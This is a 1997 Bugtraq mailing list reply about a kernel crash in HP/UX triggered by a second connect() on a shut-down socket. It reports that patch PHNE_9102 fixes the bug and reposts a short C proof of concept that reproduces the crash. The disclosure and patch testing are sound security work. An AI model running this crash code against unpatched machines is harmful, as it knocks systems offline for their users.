Bugtraq mailing list archives
Re: Bug in connect() ?
From: hofmann () WPAX01 PHYSIK UNI-WUERZBURG DE (Frank Hofmann)
Date: Mon, 10 Mar 1997 20:25:58 +0100
On Fri, 7 Mar 1997, Frank Hofmann wrote: [ ... ]
I'm gonna try some recent HP patches as I had one report that HP/UX 9.05 is vulnerable and one that it is not. Perhaps it's fixed and I'm missing the patch.
I indeed did miss the patch. For my 10.01 box, PHNE_9102 (ARPA transport cumulative patch) fixes the crash. I did not have this installed as I thought it to be mostly identical to the earlier PHNE_9032 (remember the ping attack ?). Obviously it is not. Someone tried the corresponding patches on other HP/UX versions ? Bye, Frank Hofmann Here's the code again, for those having missed the original posting: ------------------------------------------------------------------------- #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/time.h> #include <netdb.h> #include <stdio.h> main(int argc, char **argv) { int sock; struct sockaddr_in server; struct hostent *hp; if (argc > 3) exit(-1); sock = socket(AF_INET, SOCK_STREAM, 0); hp = gethostbyname("localhost"); bcopy((char*)hp->h_addr, (char*)&server.sin_addr, hp->h_length); server.sin_family = AF_INET; server.sin_port = (argc >= 2) ? atoi(argv[1]) : 23; connect(sock, (struct sockaddr *)&server, sizeof server); shutdown(sock, 2); server.sin_port = (argc == 3) ? atoi(argv[2]) : 24; connect(sock, (struct sockaddr *)&server, sizeof server); }
Current thread:
- Re: Bug in connect() ? Frank Hofmann (Mar 07)
- Re: Bug in connect() ? Frank Hofmann (Mar 10)
- Lynx/MSIE denial-of-service Doctor Who (Mar 10)
- Re: Lynx/MSIE denial-of-service Christopher Blizzard (Mar 10)
- SGI Security Advisory 19970301-01-P - IRIX 5.x and 6.x fsdump Aleph One (Mar 10)
- xterm segfaults from environment variables - too obvious David Luyer (Mar 10)
- Secuirty Hole In Older Perl Installs... Ken Robson (Mar 11)
- Re: xterm segfaults from environment variables - too obvious Alex Belits (Mar 11)
- Division of Privilege (DoP) - Potential Security Vulnerability Aleph One (Mar 11)
- runpipe v1.2 with security hole fix Aleph One (Mar 11)